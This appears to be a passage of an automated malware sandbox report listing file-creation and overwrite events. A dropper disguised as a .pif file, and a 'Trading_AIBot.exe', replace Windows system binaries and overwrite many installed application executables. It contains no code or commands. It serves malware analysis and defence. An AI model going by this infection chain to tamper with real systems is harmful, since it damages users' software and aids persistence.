                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\7-Zip\7z.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | System file written: C:\Windows\System32\AppVClient.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\7-Zip\7zG.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\7-Zip\Uninstall.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | System file written: C:\Windows\System32\FXSSVC.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | System file written: C:\Windows\System32\alg.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\7-Zip\7zFM.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif | File created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | File created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\7-Zip\7z.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\xpha.pif
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Mozilla Firefox\updater.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\7-Zip\Uninstall.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | File created: C:\Windows\System32\FXSSVC.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif | File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
                    Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | File created: C:\Windows\System32\alg.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\7-Zip\7zFM.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif | File created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
                    Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\Libraries\Juqmtmya.PIF
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | File created: C:\Users\Public\Libraries\aymtmquJ.pif
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                    Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
